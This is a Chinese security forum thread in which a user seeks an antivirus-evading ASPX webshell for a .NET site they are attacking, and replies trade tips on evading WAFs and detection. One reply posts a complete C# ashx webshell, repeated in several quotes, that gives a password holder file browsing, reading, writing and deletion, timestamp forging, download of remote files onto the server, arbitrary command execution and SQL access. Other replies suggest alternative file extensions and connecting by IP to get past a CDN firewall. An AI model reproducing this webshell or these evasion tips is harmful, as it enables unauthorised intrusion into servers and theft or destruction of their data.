大佬们,求个aspx免杀大马和思路

2023-03-24 15:46:15 23 5583
现在情况是遇见一个.net4.0的站,传了免杀的哥斯拉冰蝎马,连接不上,马没有被杀;
怀疑有流量设备,所以想传个大马,网上找了很多大马,要么被杀,要么报错;
报错信息如下,因为我菜鸡不懂代码,所以希望有师傅可以分析一下情况或者给个好马子;
师傅还可以简单讲讲出现这种情况的原因的话那最好不过了

关于作者

Anonymous0篇文章0篇回复

We are Anonymous!

评论23次

要评论?请先  登录  或  注册
  • TOP1
    2023-3-25 08:52

    已经解决问题了各位师傅们,非常感谢;两种解决方案:1)用天蝎直接连2)把域名换成ip和端口号再连接虽然到现在不知道问题的成因是什么,但起码有了临时解决方案;欢迎各位师傅做出简单分析和解释;

  • 23楼
    2023-4-4 21:14

    IP能直接连上 是不是域名有做CDN加速被CDN的WAF拦截

  • 22楼
    2023-3-26 23:13

    又学到一个姿势,竟然可以使用ashx后缀

  • 21楼
    2023-3-25 21:45

    应该是waf,不像是杀毒

  • 20楼
    2023-3-25 15:38
    kangakang

    已经解决问题了各位师傅们,非常感谢;两种解决方案:1)用天蝎直接连2)把域名换成ip和端口号再连接虽然到现在不知道问题的成因是什么,但起码有了临时解决方案;欢迎各位师傅做出简单分析和解释;

    1

    用IP和端口就能链接,那说明有waf吧

  • 19楼
    2023-3-25 08:55
    z1v0s

    <%@ WebHandler Language="C#" Class="Handler" %>using System;using System.Web;using System.IO;using System.Net;using System.Text;using System.Data;using System.Data.SqlClient;using System.Diagnostics;public class Handler : IHttpHandler{ public void ProcessRequest(HttpContext context) { String Z = context.Request.Form;//设置密码z if (Z != "") { String Z1 = context.Request.Form; String Z2 = context.Request.Form; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); m.Write(Z2); R = "1"; m.Close(); break; } case "E": { if (Directory.Exists(Z1)) { Directory.Delete(Z1, true); } else { File.Delete(Z1); } R = "1"; break; } case "F": { context.Response.Clear(); context.Response.Write("\x2D\x3E\x7C"); context.Response.WriteFile(Z1); context.Response.Write("\x7C\x3C\x2D"); goto End; } case "G": { byte[] B = new byte; for (int i = 0; i < Z2.Length; i += 2) { B = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); } FileStream fs = new FileStream(Z1, FileMode.Create); fs.Write(B, 0, B.Length); fs.Close(); R = "1"; break; } case "H": { CP(Z1, Z2, context); R = "1"; break; } case "I": { if (Directory.Exists(Z1)) { Directory.Move(Z1, Z2); } else { File.Move(Z1, Z2); } break; } case "J": { Directory.CreateDirectory(Z1); R = "1"; break; } case "K": { DateTime TM = Convert.ToDateTime(Z2); if (Directory.Exists(Z1)) { Directory.SetCreationTime(Z1, TM); Directory.SetLastWriteTime(Z1, TM); Directory.SetLastAccessTime(Z1, TM); } else { File.SetCreationTime(Z1, TM); File.SetLastWriteTime(Z1, TM); File.SetLastAccessTime(Z1, TM); } R = "1"; break; } case "L": { HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); RQ.Method = "GET"; RQ.ContentType = "application/x-www-form-urlencoded"; HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); Stream WF = WB.GetResponseStream(); FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); int i; byte[] buffer = new byte; while (true) { i = WF.Read(buffer, 0, buffer.Length); if (i < 1) { break; } FS.Write(buffer, 0, i); } WF.Close(); WB.Close(); FS.Close(); R = "1"; break; } case "M": { ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); Process e = new Process(); StreamReader OT, ER; c.UseShellExecute = false; c.RedirectStandardOutput = true; c.RedirectStandardError = true; e.StartInfo = c; c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2); e.Start(); OT = e.StandardOutput; ER = e.StandardError; e.Close(); R = OT.ReadToEnd() + ER.ReadToEnd(); break; } case "N": { String strDat = Z1.ToUpper(); SqlConnection Conn = new SqlConnection(Z1); Conn.Open(); R = Conn.Database + "\t"; Conn.Close(); break; } case "O": { String[] x = Z1.Replace("\r", "").Split('\n'); String strConn = x, strDb = x; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns"); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0}\t", dt.Rows.ToString()); } break; } case "P": { String[] x = Z1.Replace("\r", "").Split('\n'), p = new String; String strConn = x, strDb = x, strTable = x; p = strDb; p = strTable; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns", p); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0} ({1})\t", dt.Rows.ToString(), dt.Rows.ToString()); } break; } case "Q": { String[] x = Z1.Replace("\r", "").Split('\n'); String strDat, strConn = x, strDb = x; int i, c; strDat = Z2.ToUpper(); SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) { SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); DataSet ds = new DataSet(); OD.Fill(ds); if (ds.Tables.Count > 0) { DataRowCollection rows = ds.Tables.Rows; for (c = 0; c < ds.Tables.Columns.Count; c++) { R += String.Format("{0}\t|\t", ds.Tables.Columns.ColumnName.ToString()); } R += "\r\n"; for (i = 0; i < rows.Count; i++) { for (c = 0; c < ds.Tables.Columns.Count; c++) { R += String.Format("{0}\t|\t", rows.ToString()); } R += "\r\n"; } } ds.Clear(); ds.Dispose(); } else { SqlCommand cm = Conn.CreateCommand(); cm.CommandText = Z2; cm.ExecuteNonQuery(); R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; } Conn.Close(); break; } default: goto End; } } catch(Exception E) { R="ERROR:// "+E.Message; } context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); End:; } } public bool IsReusable { get { return false; } } public void CP(String S,String D,HttpContext context) { if(Directory.Exists(S)) { DirectoryInfo m=new DirectoryInfo(S); Directory.CreateDirectory(D); foreach(FileInfo F in m.GetFiles()) { File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); } foreach(DirectoryInfo F in m.GetDirectories()) { CP(S + "\\" + F.Name, D + "\\" + F.Name, context); } } else { File.Copy(S,D); } }}//--></SCRIPT>保存为ashx

    1

    虽然也没有连接成功,但谢谢师傅给的马, 问题已经有了解决的方案,谢谢师傅参与的讨论

  • 18楼
    2023-3-25 08:52

    已经解决问题了各位师傅们,非常感谢; 两种解决方案: 1)用天蝎直接连 2)把域名换成ip和端口号再连接 虽然到现在不知道问题的成因是什么,但起码有了临时解决方案; 欢迎各位师傅做出简单分析和解释;

  • 17楼
    2023-3-25 08:44

    先随便写个123,也报错就是配置问题,估计只支持asp

  • 16楼
    2023-3-25 02:23

    传个txt 里面写上shell代码 看看是不是基于文件内容做的查杀。具体是不是过滤了哪些函数。

  • 15楼
    2023-3-24 23:23

    你先弄个正常的aspx试试能不能运行,要是也不能运行很可能配置有问题,不是马的事了

  • 14楼
    2023-3-24 21:56

    运行错误不代表不能执行,只要不是抛出具体错误代码就行

  • 13楼
    2023-3-24 21:24
    z1v0s

    <%@ WebHandler Language="C#" Class="Handler" %>using System;using System.Web;using System.IO;using System.Net;using System.Text;using System.Data;using System.Data.SqlClient;using System.Diagnostics;public class Handler : IHttpHandler{ public void ProcessRequest(HttpContext context) { String Z = context.Request.Form;//设置密码z if (Z != "") { String Z1 = context.Request.Form; String Z2 = context.Request.Form; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); m.Write(Z2); R = "1"; m.Close(); break; } case "E": { if (Directory.Exists(Z1)) { Directory.Delete(Z1, true); } else { File.Delete(Z1); } R = "1"; break; } case "F": { context.Response.Clear(); context.Response.Write("\x2D\x3E\x7C"); context.Response.WriteFile(Z1); context.Response.Write("\x7C\x3C\x2D"); goto End; } case "G": { byte[] B = new byte; for (int i = 0; i < Z2.Length; i += 2) { B = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); } FileStream fs = new FileStream(Z1, FileMode.Create); fs.Write(B, 0, B.Length); fs.Close(); R = "1"; break; } case "H": { CP(Z1, Z2, context); R = "1"; break; } case "I": { if (Directory.Exists(Z1)) { Directory.Move(Z1, Z2); } else { File.Move(Z1, Z2); } break; } case "J": { Directory.CreateDirectory(Z1); R = "1"; break; } case "K": { DateTime TM = Convert.ToDateTime(Z2); if (Directory.Exists(Z1)) { Directory.SetCreationTime(Z1, TM); Directory.SetLastWriteTime(Z1, TM); Directory.SetLastAccessTime(Z1, TM); } else { File.SetCreationTime(Z1, TM); File.SetLastWriteTime(Z1, TM); File.SetLastAccessTime(Z1, TM); } R = "1"; break; } case "L": { HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); RQ.Method = "GET"; RQ.ContentType = "application/x-www-form-urlencoded"; HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); Stream WF = WB.GetResponseStream(); FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); int i; byte[] buffer = new byte; while (true) { i = WF.Read(buffer, 0, buffer.Length); if (i < 1) { break; } FS.Write(buffer, 0, i); } WF.Close(); WB.Close(); FS.Close(); R = "1"; break; } case "M": { ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); Process e = new Process(); StreamReader OT, ER; c.UseShellExecute = false; c.RedirectStandardOutput = true; c.RedirectStandardError = true; e.StartInfo = c; c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2); e.Start(); OT = e.StandardOutput; ER = e.StandardError; e.Close(); R = OT.ReadToEnd() + ER.ReadToEnd(); break; } case "N": { String strDat = Z1.ToUpper(); SqlConnection Conn = new SqlConnection(Z1); Conn.Open(); R = Conn.Database + "\t"; Conn.Close(); break; } case "O": { String[] x = Z1.Replace("\r", "").Split('\n'); String strConn = x, strDb = x; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns"); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0}\t", dt.Rows.ToString()); } break; } case "P": { String[] x = Z1.Replace("\r", "").Split('\n'), p = new String; String strConn = x, strDb = x, strTable = x; p = strDb; p = strTable; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns", p); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0} ({1})\t", dt.Rows.ToString(), dt.Rows.ToString()); } break; } case "Q": { String[] x = Z1.Replace("\r", "").Split('\n'); String strDat, strConn = x, strDb = x; int i, c; strDat = Z2.ToUpper(); SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) { SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); DataSet ds = new DataSet(); OD.Fill(ds); if (ds.Tables.Count > 0) { DataRowCollection rows = ds.Tables.Rows; for (c = 0; c < ds.Tables.Columns.Count; c++) { R += String.Format("{0}\t|\t", ds.Tables.Columns.ColumnName.ToString()); } R += "\r\n"; for (i = 0; i < rows.Count; i++) { for (c = 0; c < ds.Tables.Columns.Count; c++) { R += String.Format("{0}\t|\t", rows.ToString()); } R += "\r\n"; } } ds.Clear(); ds.Dispose(); } else { SqlCommand cm = Conn.CreateCommand(); cm.CommandText = Z2; cm.ExecuteNonQuery(); R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; } Conn.Close(); break; } default: goto End; } } catch(Exception E) { R="ERROR:// "+E.Message; } context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); End:; } } public bool IsReusable { get { return false; } } public void CP(String S,String D,HttpContext context) { if(Directory.Exists(S)) { DirectoryInfo m=new DirectoryInfo(S); Directory.CreateDirectory(D); foreach(FileInfo F in m.GetFiles()) { File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); } foreach(DirectoryInfo F in m.GetDirectories()) { CP(S + "\\" + F.Name, D + "\\" + F.Name, context); } } else { File.Copy(S,D); } }}//--></SCRIPT>保存为ashx

    1

    D盾直接5级

  • 12楼
    2023-3-24 20:18

    应该是网站配置问题,传的所有aspx都是这样。

  • 11楼
    2023-3-24 19:49
    z1v0s

    <%@ WebHandler Language="C#" Class="Handler" %>using System;using System.Web;using System.IO;using System.Net;using System.Text;using System.Data;using System.Data.SqlClient;using System.Diagnostics;public class Handler : IHttpHandler{ public void ProcessRequest(HttpContext context) { String Z = context.Request.Form;//设置密码z if (Z != "") { String Z1 = context.Request.Form; String Z2 = context.Request.Form; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); m.Write(Z2); R = "1"; m.Close(); break; } case "E": { if (Directory.Exists(Z1)) { Directory.Delete(Z1, true); } else { File.Delete(Z1); } R = "1"; break; } case "F": { context.Response.Clear(); context.Response.Write("\x2D\x3E\x7C"); context.Response.WriteFile(Z1); context.Response.Write("\x7C\x3C\x2D"); goto End; } case "G": { byte[] B = new byte; for (int i = 0; i < Z2.Length; i += 2) { B = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); } FileStream fs = new FileStream(Z1, FileMode.Create); fs.Write(B, 0, B.Length); fs.Close(); R = "1"; break; } case "H": { CP(Z1, Z2, context); R = "1"; break; } case "I": { if (Directory.Exists(Z1)) { Directory.Move(Z1, Z2); } else { File.Move(Z1, Z2); } break; } case "J": { Directory.CreateDirectory(Z1); R = "1"; break; } case "K": { DateTime TM = Convert.ToDateTime(Z2); if (Directory.Exists(Z1)) { Directory.SetCreationTime(Z1, TM); Directory.SetLastWriteTime(Z1, TM); Directory.SetLastAccessTime(Z1, TM); } else { File.SetCreationTime(Z1, TM); File.SetLastWriteTime(Z1, TM); File.SetLastAccessTime(Z1, TM); } R = "1"; break; } case "L": { HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); RQ.Method = "GET"; RQ.ContentType = "application/x-www-form-urlencoded"; HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); Stream WF = WB.GetResponseStream(); FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); int i; byte[] buffer = new byte; while (true) { i = WF.Read(buffer, 0, buffer.Length); if (i < 1) { break; } FS.Write(buffer, 0, i); } WF.Close(); WB.Close(); FS.Close(); R = "1"; break; } case "M": { ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); Process e = new Process(); StreamReader OT, ER; c.UseShellExecute = false; c.RedirectStandardOutput = true; c.RedirectStandardError = true; e.StartInfo = c; c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2); e.Start(); OT = e.StandardOutput; ER = e.StandardError; e.Close(); R = OT.ReadToEnd() + ER.ReadToEnd(); break; } case "N": { String strDat = Z1.ToUpper(); SqlConnection Conn = new SqlConnection(Z1); Conn.Open(); R = Conn.Database + "\t"; Conn.Close(); break; } case "O": { String[] x = Z1.Replace("\r", "").Split('\n'); String strConn = x, strDb = x; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns"); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0}\t", dt.Rows.ToString()); } break; } case "P": { String[] x = Z1.Replace("\r", "").Split('\n'), p = new String; String strConn = x, strDb = x, strTable = x; p = strDb; p = strTable; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns", p); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0} ({1})\t", dt.Rows.ToString(), dt.Rows.ToString()); } break; } case "Q": { String[] x = Z1.Replace("\r", "").Split('\n'); String strDat, strConn = x, strDb = x; int i, c; strDat = Z2.ToUpper(); SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) { SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); DataSet ds = new DataSet(); OD.Fill(ds); if (ds.Tables.Count > 0) { DataRowCollection rows = ds.Tables.Rows; for (c = 0; c < ds.Tables.Columns.Count; c++) { R += String.Format("{0}\t|\t", ds.Tables.Columns.ColumnName.ToString()); } R += "\r\n"; for (i = 0; i < rows.Count; i++) { for (c = 0; c < ds.Tables.Columns.Count; c++) { R += String.Format("{0}\t|\t", rows.ToString()); } R += "\r\n"; } } ds.Clear(); ds.Dispose(); } else { SqlCommand cm = Conn.CreateCommand(); cm.CommandText = Z2; cm.ExecuteNonQuery(); R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; } Conn.Close(); break; } default: goto End; } } catch(Exception E) { R="ERROR:// "+E.Message; } context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); End:; } } public bool IsReusable { get { return false; } } public void CP(String S,String D,HttpContext context) { if(Directory.Exists(S)) { DirectoryInfo m=new DirectoryInfo(S); Directory.CreateDirectory(D); foreach(FileInfo F in m.GetFiles()) { File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); } foreach(DirectoryInfo F in m.GetDirectories()) { CP(S + "\\" + F.Name, D + "\\" + F.Name, context); } } else { File.Copy(S,D); } }}//--></SCRIPT>保存为ashx

    1

    菜刀直接连

  • 10楼
    2023-3-24 15:46

    <%@ WebHandler Language="C#" Class="Handler" %>  using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Diagnostics;  public class Handler : IHttpHandler {     public void ProcessRequest(HttpContext context)     {         String Z = context.Request.Form["12"];//设置密码z         if (Z != "")         {             String Z1 = context.Request.Form["Z1"];             String Z2 = context.Request.Form["Z2"];             String R = "";             try             {                 switch (Z)                 {                     case "A":                         {                             String[] c = Directory.GetLogicalDrives();                             R = String.Format("{0}\t", context.Server.MapPath("/"));                             for (int i = 0; i < c.Length; i++)                                 R += c[i][0] + ":";                             break;                         }                     case "B":                         {                             DirectoryInfo m = new DirectoryInfo(Z1);                             foreach (DirectoryInfo D in m.GetDirectories())                             {                                 R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));                             }                             foreach (FileInfo D in m.GetFiles())                             {                                 R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);                             }                             break;                         }                     case "C":                         {                             StreamReader m = new StreamReader(Z1, Encoding.Default);                             R = m.ReadToEnd();                             m.Close();                             break;                         }                     case "D":                         {                             StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);                             m.Write(Z2);                             R = "1";                             m.Close();                             break;                         }                     case "E":                         {                             if (Directory.Exists(Z1))                             {                                 Directory.Delete(Z1, true);                             }                             else                             {                                 File.Delete(Z1);                             }                             R = "1";                             break;                         }                     case "F":                         {                             context.Response.Clear();                             context.Response.Write("\x2D\x3E\x7C");                             context.Response.WriteFile(Z1);                             context.Response.Write("\x7C\x3C\x2D");                             goto End;                         }                     case "G":                         {                             byte[] B = new byte[Z2.Length / 2];                             for (int i = 0; i < Z2.Length; i += 2)                             {                                 B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);                             }                             FileStream fs = new FileStream(Z1, FileMode.Create);                             fs.Write(B, 0, B.Length);                             fs.Close();                             R = "1";                             break;                         }                     case "H":                         {                             CP(Z1, Z2, context);                             R = "1";                             break;                         }                     case "I":                         {                             if (Directory.Exists(Z1))                             {                                 Directory.Move(Z1, Z2);                             }                             else                             {                                 File.Move(Z1, Z2);                             }                             break;                         }                     case "J":                         {                             Directory.CreateDirectory(Z1);                             R = "1";                             break;                         }                     case "K":                         {                             DateTime TM = Convert.ToDateTime(Z2);                             if (Directory.Exists(Z1))                             {                                 Directory.SetCreationTime(Z1, TM);                                 Directory.SetLastWriteTime(Z1, TM);                                 Directory.SetLastAccessTime(Z1, TM);                             }                             else                             {                                 File.SetCreationTime(Z1, TM);                                 File.SetLastWriteTime(Z1, TM);                                 File.SetLastAccessTime(Z1, TM);                             }                             R = "1";                             break;                         }                     case "L":                         {                             HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));                             RQ.Method = "GET";                             RQ.ContentType = "application/x-www-form-urlencoded";                             HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();                             Stream WF = WB.GetResponseStream();                             FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);                             int i;                             byte[] buffer = new byte[1024];                             while (true)                             {                                 i = WF.Read(buffer, 0, buffer.Length);                                 if (i < 1)                                 {                                     break;                                 }                                 FS.Write(buffer, 0, i);                             }                             WF.Close();                             WB.Close();                             FS.Close();                             R = "1";                             break;                         }                     case "M":                         {                             ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2));                             Process e = new Process();                             StreamReader OT, ER;                             c.UseShellExecute = false;                             c.RedirectStandardOutput = true;                             c.RedirectStandardError = true;                             e.StartInfo = c;                             c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);                             e.Start();                             OT = e.StandardOutput;                             ER = e.StandardError;                             e.Close();                             R = OT.ReadToEnd() + ER.ReadToEnd();                             break;                         }                     case "N":                         {                             String strDat = Z1.ToUpper();                             SqlConnection Conn = new SqlConnection(Z1);                             Conn.Open();                             R = Conn.Database + "\t";                             Conn.Close();                             break;                         }                     case "O":                         {                             String[] x = Z1.Replace("\r", "").Split('\n');                             String strConn = x[0], strDb = x[1];                             SqlConnection Conn = new SqlConnection(strConn);                             Conn.Open();                             DataTable dt = Conn.GetSchema("Columns");                             Conn.Close();                             for (int i = 0; i < dt.Rows.Count; i++)                             {                                 R += String.Format("{0}\t", dt.Rows[i][2].ToString());                             }                             break;                         }                     case "P":                         {                             String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];                             String strConn = x[0], strDb = x[1], strTable = x[2];                             p[0] = strDb;                             p[2] = strTable;                             SqlConnection Conn = new SqlConnection(strConn);                             Conn.Open();                             DataTable dt = Conn.GetSchema("Columns", p);                             Conn.Close();                             for (int i = 0; i < dt.Rows.Count; i++)                             {                                 R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());                             }                             break;                         }                     case "Q":                         {                             String[] x = Z1.Replace("\r", "").Split('\n');                             String strDat, strConn = x[0], strDb = x[1];                             int i, c;                             strDat = Z2.ToUpper();                             SqlConnection Conn = new SqlConnection(strConn);                             Conn.Open();                             if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)                             {                                 SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);                                 DataSet ds = new DataSet();                                 OD.Fill(ds);                                 if (ds.Tables.Count > 0)                                 {                                     DataRowCollection rows = ds.Tables[0].Rows;                                     for (c = 0; c < ds.Tables[0].Columns.Count; c++)                                     {                                         R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());                                     }                                     R += "\r\n";                                     for (i = 0; i < rows.Count; i++)                                     {                                         for (c = 0; c < ds.Tables[0].Columns.Count; c++)                                         {                                             R += String.Format("{0}\t|\t", rows[i][c].ToString());                                         }                                         R += "\r\n";                                     }                                 }                                 ds.Clear();                                 ds.Dispose();                             }                             else                             {                                 SqlCommand cm = Conn.CreateCommand();                                 cm.CommandText = Z2;                                 cm.ExecuteNonQuery();                                 R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";                             }                             Conn.Close();                             break;                         }                     default: goto End;                 }             }             catch(Exception E)           {             R="ERROR:// "+E.Message;           }           context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D");           End:;         }     }           public bool IsReusable     {         get         {             return false;         }      }      public void CP(String S,String D,HttpContext context)     {       if(Directory.Exists(S))         {           DirectoryInfo m=new DirectoryInfo(S);           Directory.CreateDirectory(D);           foreach(FileInfo F in m.GetFiles())           {             File.Copy(S+"\\"+F.Name,D+"\\"+F.Name);           }           foreach(DirectoryInfo F in m.GetDirectories())           {                     CP(S + "\\" + F.Name, D + "\\" + F.Name, context);           }         }       else       {         File.Copy(S,D);       }     } } //--></SCRIPT>
    保存为ashx

  • 9楼
    2023-3-24 17:26

    多换不同个版本的连接工具试试

  • 8楼
    2023-3-24 17:10

    先写个123 在aspx看显示啥

  • 7楼
    2023-3-24 17:08

    一般是版本问题,但是里面的杀软不清楚,有的时候defender杀shell挺狠,可以找几个加密的大马,适用性也强,小马几乎被秒杀

  • 6楼
    2023-3-24 16:46
    reputati0n

    传个asmx试试,基本不会被拦

    1

    也试过,连不上

  • 5楼
    2023-3-24 16:43

    用最早的那个菜刀试试

  • 4楼
    2023-3-24 16:39
    agoniamor

    一般aspx报错也是可以连接的,用蚁剑试试,aspx马找不到asp的也可以试试,或者aspx图片大马

    1

    这我知道,哥斯拉冰鞋都试过了